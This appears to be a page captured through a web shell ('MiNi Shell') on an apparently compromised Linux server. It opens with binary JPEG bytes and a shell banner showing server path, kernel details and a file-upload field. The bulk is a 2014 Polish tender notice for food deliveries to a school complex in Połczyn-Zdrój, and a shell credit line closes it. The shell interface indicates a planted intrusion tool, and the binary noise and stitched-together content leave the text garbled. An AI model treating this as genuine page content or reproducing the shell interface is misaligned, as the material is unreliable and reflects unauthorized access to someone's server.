JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141218/261099-N-2014.html

<p class="kh_header"><b>Połczyn-Zdrój: Dostawa artykułów żywnościowych w 2015 roku
 dla Zespołu Placówek Oświatowych w Połczynie - Zdroju</b><br>
<b>Numer ogłoszenia: 261099 - 2014; data zamieszczenia: 18.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Placówek Oświatowych , ul. Grunwaldzka 33, 78-320 Połczyn-Zdrój, woj. zachodniopomorskie, tel. 94 3662093, faks 94 3662082.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dwd-polczyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych w 2015 roku
 dla Zespołu Placówek Oświatowych w Połczynie - Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa oznaczona jako Część I świeże warzywa i owoce będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 03221000-6, 03222300-6

Lp.	Nazwa artykułu	Jednostka miary	Ilość
1.		Banan 	kg	330 
2.		Brzoskwinie	kg	10 
3.		Buraki 		
	Miesiąc I - III	kg	100
	Miesiąc IV - VI	Kg	90
	Miesiąc VII - IX	Kg	113
	Miesiąc X - XII	kg	86
4.		Cebula		
	Miesiąc I - III	kg	73
	Miesiąc IV - VI	kg	57
	Miesiąc VII - IX	kg	63
	Miesiąc X - XII	kg	48
5.		Cytryna		
	Miesiąc I - III	kg	58
	Miesiąc IV - VI	kg	48
	Miesiąc VII - IX	kg	88
	Miesiąc X - XII	kg	36
6.		Biała rzodkiew 	kg	36
7.		Czosnek	kg	7
8.		Fasola sucha (średnia)	kg	85
9.		Groch łuskany	kg	18 
10.		Jabłka deserowe		
	Miesiąc I - III	kg	215
	Miesiąc IV - VI	kg	140
	Miesiąc VII - IX	kg	203
	Miesiąc X - XII	kg	116
11.		Kapusta młoda	Szt.	126 
12.		Kapusta kiszona		
	Miesiąc I - III	kg	75
	Miesiąc IV - VI	kg	33
	Miesiąc VII - IX	kg	15
	Miesiąc X - XII	kg	55
13.		Kapusta biała		
	Miesiąc I - III	kg	135
	Miesiąc IV - VI	kg	163
	Miesiąc VII - IX	kg	163
	Miesiąc X - XII	kg	82
14.		Kapusta czerwona	kg	48
15.		Kalafior sezon		
	Miesiąc VIII - X	szt.	20
16.		Kiwi	kg	48
17.		Koper świeży		
	Miesiąc I - VI	kg	22
	Miesiąc VII - IX	kg	67
	Miesiąc X - XII	kg	25
18.		Mandarynka	kg	10
19.		Marchew		
	Miesiąc I - III	kg	150
	Miesiąc IV - VI	kg	140
	Miesiąc VII - IX	kg	201
	Miesiąc X - XII	kg	119
20.		Natka pietruszki		
	Miesiąc I-III	szt.	80
	Miesiąc IV-IX	szt.	163
21.		Nektarynka	kg	122
22.		Ogórek kiszony		
	Miesiąc I - III	kg	37
	Miesiąc IV - VI	kg	23
	Miesiąc VII - IX	kg	26
	Miesiąc X - XII	kg	19
23.		Ogórek małosolny	kg	28
24.		Ogórek świeży 		
	Miesiąc I - V	kg	97
	Miesiąc VI - VIII	kg	162
	Miesiąc IX - XII	kg	90
25.		Papryka św.	kg	12
26.		Pieczarka	kg	35

	Miesiąc I-VI	kg	18
	Miesiąc VII - XII 	kg	14
27.		Pietruszka korzeń	kg	
	Miesiąc I-III	kg	43
	Miesiąc IV-VI	kg	43
	Miesiąc VII- IX	kg	52
	Miesiąc X-XII	kg	28
28.		Pietruszka nać	szt.	300
29.		Pomarańcze	kg	140
30.		Pomidor kl. I		
	Miesiąc I - V	kg	100
	Miesiąc VI - X	kg	90
	Miesiąc XI - XII	kg	113
	Miesiąc X - XII	kg	86
31.		Por	kg	64
32.		Rzodkiewka	pęczek	27 
33.		Sałata zielona	szt.	196 
34.		Seler	kg	117
35.		Szczypior	pęczek	205 
36.		Ziemniaki		
	Miesiąc I-V	kg	2250
	Miesiąc VI-VIII	Kg	1780
	Miesiąc IX-XII	kg	1415

Dostawa oznaczona jako Część II wyroby piekarskie będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 15811000-6

L.p.	Nazwa artykułu	Jednostka miary	Ilość
1.	Chleb  zwykły (krojony 600 g)	szt.	2713
2.	Chleb razowy (krojony 750g)	szt.	589
3.	Chleb słonecznikowy	szt.	936
4.	Bułka kajzerka (50 g)	szt.	7507
5.	Bułka zwykła (100 g)	szt.	9534
6.	Pączek ( 0,07kg)	szt.	100
7.	Bułka tarta	kg	50 
8.	Babka piaskowa	kg	13
9.	Bułka drożdżowa	szt.	1279
10.	Bułka półfrancuska	szt.	171
11.	Ciasto jogurtowe	kg	40
12.	Ciasto deserowe	kg	9
13.	Jabłecznik	kg	21
14.	Rogal z budyniem	szt.	104

Dostawa oznaczona jako Część III mrożone artykuły spożywcze będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 15331170-9

L.p.	Nazwa artykułu	Jednostka miary	Ilość
1.	Kluski śląskie	kg	98
2.	Pyzy z mięsem	kg	88
3.	Brokuł	kg	38
4.	Mieszanka warzywna  wieloskładnikowa	kg	70
5.	Fasolka szparagowa 	kg	98
6.	Kalafior 	kg	75
7.	Mieszanka kompotowa 	kg	415
8.	Truskawka 	kg	83
9.	Filet rybny z dorsza bez skóry	kg	120
10.	Filet z morszczuka	kg	41

Dostawa oznaczona jako Część IV jaja kurze L świeże będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 03142500-3

L.p.	Nazwa artykułu	Jednostka miary	Ilość
1.	Jaja kurze L 
	szt.	8840

Dostawa oznaczona jako Część V artykuły spożywcze sypkie, koncentraty, przyprawy i desery :
Kod Wspólnego Słownika Zamówień (CPV): 15800000-6

L.p.	Nazwa artykułu i wielkość opakowania jednostkowego	Jednostka miary	Ilość
1.	Dżem brzoskwiniowy	kg	           131
2.	Dżem z czarnej porzeczki	Kg	21
3.	Dżem truskawkowy	kg	77
4.	Dżem wiśniowy	kg	60
5.	Dżem z aroni	kg	28
6.	Barszcz ukraiński 450g 	szt.	54
7.	Margaryna  zwykła 250g	kg	44
8.	Barszcz biały	kg	22
9.	Baton lion	szt.	290
10.	Baton mars	szt.	210
11.	Baton snickers	szt.	200
12.	Cukier	kg	632
13.	Cukier waniliowy 20g	szt.	50
14.	Herbata granulowana 100g	szt.	419
15.	Herbatniki 50g	szt.	1249
16.	Kakao 100 % - 100 g	szt.	10
17.	Kasza jęczmienna 	kg	80
18.	Kasza manna	kg	8
19.	Kawa inka 150g	szt.	38
20.	Makaron muszelki	kg	35
21.	Makaron kokardki	kg	35
22.	Makaron nitka	kg	47
23.	Makaron rurka	kg	10
24.	Makaron spagethi	kg	75
25.	Makaron świderki	kg	93
26.	Makaron zacierka	kg	10
27.	Mąka koszalińska	kg	140
28.	Płatki kukurydziane	kg	48
29.	Płatki kulki miodowe	kg	150
30.	Ryż	kg	180
31.	Wafle grześki wp	szt.	2552
32.	Wafle grześki bp	szt.	125
33.	Zacierka babuni 250g	szt.	80
34.	Olej uniwersalny 1l	szt.	154
35.	Pasztet drobiowy 130g	szt.	400
36.	Groszek konserwowy 400g	szt.	92
37.	Kukurydza konserwowa 400g	szt.	55
38.	Ogórki konserwowe 1,6l	szt.	97
39.	Papryka konserwowa 1,6l	szt.	52
40.	Szczaw konserwowy 0,9l	szt.	34
41.	Przyprawa do kurczaka	kg	3,5
42.	Przyprawa do ryb	szt.	1,5
43.	Przyprawa do mięsa	szt.	4,5
44.	Ketchup	kg	84
45.	Koncentrat pomidorowy	kg	55
46.	Kwasek cytrynowy 50g	szt.	30
47.	Liść laurowy 20g	szt.	25
48.	Majeranek 100g	szt.	5
49.	Majonez 	kg	73
50.	Musztarda 200g	szt.	95
51.	Papryka mielona 	kg	2
52.	Pieprz naturalny mielony	kg	3
53.	Pieprz ziołowy	kg	2,5
54.	Przyprawa do zup 1L	szt.	10
55.	Maggi 200g	szt.	25
56.	Przyprawa szefa kuchni ( warzywko  )	kg	10
57.	Rosół drobiowy w kostce 11g	szt.	100
58.	Sos do spaghetti 	kg	7,5


Dostawa oznaczona jako Część VI  mięso świeże, wędliny i drób:
Kod Wspólnego Słownika Zamówień (CPV): 15100000-9



Lp.	Nazwa artykułu	Jedn.
miary	Ilość
1.		Baleron gotowany	kg	33
2.		Baleron drobiowy	kg	28
3.		Boczek wędzony	kg	10
4.		Udka świeże	kg	192
5.		Filet w ziołach drobiowy	kg	16
6.		Golonka wp.	kg	16
7.		Karkówka b/k	kg	76
8.		Kaszanka	kg	37
9.		Kiełbasa biała parzona	kg	75
10.		Kiełbasa biwakowa	kg	135
11.		Kiełbasa głogowska	kg	45
12.		Kiełbasa grillowa 	kg	35
13.		Kiełbasa jarmarczna	kg	41
14.		Kiełbasa krakowska parzona	kg	99
15.		Kiełbasa szynkowa	kg	47
16.		Kiełbasa śląska	kg	100
17.		Kiełbasa tatrzańska	kg	14
18.		Kiełbasa wiejska	kg	33
19.		Kiełbasa zwyczajna	kg	41
20.		Kiełbasa żywiecka parzona	kg	17
21.		Korpus drobiowy 	kg	166
22.		Kości karkowo - schabowe	kg	342
23.		Kurczak św. 	kg	223
24.		Łopatka bk	kg	286
25.		Metka łososiowa	kg	22
26.		Mielonka tyrolska	kg	93
27.		Mięso gulaszowe drobiowe II	kg	65
28.		Ogonówka  wędzona	kg	84
29.		Parówki cienkie	kg	131
30.		Parówkowa 	kg	122
31.		Pasztet zapiekany	kg	93
32.		Pasztetowa drobiowa	kg	55
33.		Pieczeń rzymska	kg	10
34.		Filet drobiowy św.	kg	51
35.		Pierś drobiowa wędzona	kg	56
36.		Polędwica drobiowa	kg	27
37.		Polędwica prasowana ex	kg	13
38.		Polędwica sopocka	kg	85
39.		Polędwica z majerankiem	kg	33
40.		Rolada szynkowa	kg	18
41.		Salceson czosnkowy	kg	22
42.		Schab bk	kg	307
43.		Schab pieczony	kg	38
44.		Serdelki	kg	36
45.		Słonina	kg	93
46.		Smalec	kg	36
47.		Szynka bk	kg	145
48.		Szynka gotowana	kg	62
49.		Szynka konserwowa	kg	70
50.		Szynk drobiowa	kg	21
51.		Udziec z kurczaka	kg	150
52.		Wątroba drobiowa	kg	49
53.		Wędzonka 	kg	24
54.		Żeberka wp.	kg	60

Dostawa oznaczona jako Część VII  mleko i produkty mleczarskie:
Kod Wspólnego Słownika Zamówień (CPV):  15500000-3


L.p.	Nazwa artykułu	Jednostka miary	Ilość
1.	Jogurt owocowy 150 g	szt.	1749
2.	Masło śmietankowe 82% kostka 200g	kg	676
3.	Mleko 2% świeże	l.	2861
4.	Ser żółty gouda/edamski	kg	188
5.	Serki topione miks krążek 140g	op.	265
6.	Serek topiony  kostka 100 g	szt.	430
7.	Ser topiony plastry 130 g	op.	590
8.	Ser wędzony	kg	83
9.	Ser almette 150 g	szt.	267
10.	Serek homogenizowany 150 g	szt.	887
11.	Śmietana 18% 	L	240
12.	Twaróg półtłusty	kg	214
13.	Rolada ustrzycka	kg	84.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6, 15.81.10.00-6, 15.33.11.70-9, 03.14.25.00-3, 15.80.00.00-6, 15.10.00.00-9, 15.50.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy:
Wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, minimum 2 dostawy, odpowiadające swoim rodzajem i wartością dostawie stanowiącej przedmiot zamówienia. Przez dostawę odpowiadającą rodzajem rozumie się cykliczną dostawę żywności przez okres min. 12 miesięcy. Nie określa się minimalnej wartości zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.dwd.powiatswidwinski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Placówek Oświatowych 
ul. Grunwaldzka 33, 
78-320 Połczyn - Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.12.2014 godzina 10:00, miejsce: Biuro Zespółu Placówek Oświatowych 
ul. Grunwaldzka 33, 
78-320 Połczyn - Zdrój.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com